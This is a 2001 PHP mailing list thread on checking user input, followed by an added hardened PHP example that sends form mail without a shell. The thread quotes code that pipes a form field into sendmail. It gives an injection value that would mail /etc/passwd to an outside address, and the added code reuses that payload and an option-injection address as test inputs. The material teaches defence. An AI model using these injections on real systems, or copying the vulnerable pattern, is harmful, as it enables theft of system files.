At 06:03 PM 12/20/2001 -0800, Philip Hallstrom wrote:
> > I've done something similar in the past just for kicks, and I got the same
> > result you did (i.e. an error).  I believe this is because mysql_query()
> > expects ONE query at a time and will break if you send two or more.  I
> > could be completely and totally wrong about that, though (someone please
> > correct me if I am)...
>
>Maybe this one failed, but it's always a good idea to check user input.
>Let's say you're emailing a form and you don't use the mail() function,
>but make a call directly to sendmail... and you're sloppy... so you do
>this:
[...]

True.  But we were speaking specifically about MySQL.  When you start 
toying with external programs and exec() and so forth then you've opened up 
a whole other can of worms security-wise...

>$fp = fopen("|/usr/bin/sendmail $sendto");
>#write stuff to pipe to send email...
>
>Now... what if when I filled out the form I set $sendto equal to this:
>
>[EMAIL PROTECTED]; /usr/bin/mail [EMAIL PROTECTED] < /etc/passwd

A definite possibility, but it does depend on the hacker in question 
knowing exactly how your script is written...


-- 
PHP General Mailing List (http://www.php.net/)
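The injection discussed in this thread works because the recipient string reaches a shell. The following is an added example, not code from any poster in the thread, showing one way to validate the address and invoke sendmail without a shell. The function names and sample addresses are hypothetical, and it assumes PHP 7.4+ and a sendmail binary that accepts `-i` and `--`.

```php
<?php
// Added example; function names and sample addresses are hypothetical.
const SENDMAIL = '/usr/bin/sendmail';   // path taken from the thread

// Accept only one syntactically valid address that cannot be read as an option.
function safe_recipient(string $input): ?string
{
    $addr = filter_var($input, FILTER_VALIDATE_EMAIL);
    if ($addr === false || $addr[0] === '-') {
        return null;
    }
    return $addr;
}

// Hardened send: the array form of proc_open() (PHP 7.4+) executes the binary
// directly, so no shell ever parses the recipient.
function send_form_mail(string $sendto, string $subject, string $body): bool
{
    $addr = safe_recipient($sendto);
    if ($addr === null) {
        return false;
    }
    $subject = str_replace(["\r", "\n"], ' ', $subject);  // block header injection
    $pipes = [];
    // Assumption: this sendmail treats "--" as the end of options.
    $proc = proc_open([SENDMAIL, '-i', '--', $addr], [0 => ['pipe', 'r']], $pipes);
    if (!is_resource($proc)) {
        return false;
    }
    fwrite($pipes[0], "To: $addr\nSubject: $subject\n\n$body\n");
    fclose($pipes[0]);
    return proc_close($proc) === 0;
}

// Constructed inputs: a normal address, the shape of payload from the thread,
// and an address that would otherwise be parsed as a command-line option.
$samples = [
    'alice@example.com',
    'alice@example.com; /usr/bin/mail mallory@example.net < /etc/passwd',
    '-oQ/tmp@example.com',
];
foreach ($samples as $s) {
    printf("%-70s %s\n", $s, safe_recipient($s) === null ? 'rejected' : 'accepted');
}
```

Validation alone is not the whole fix: passing the address as a separate argv element means that even a value that slipped through would be delivered to sendmail as data, not interpreted as shell syntax.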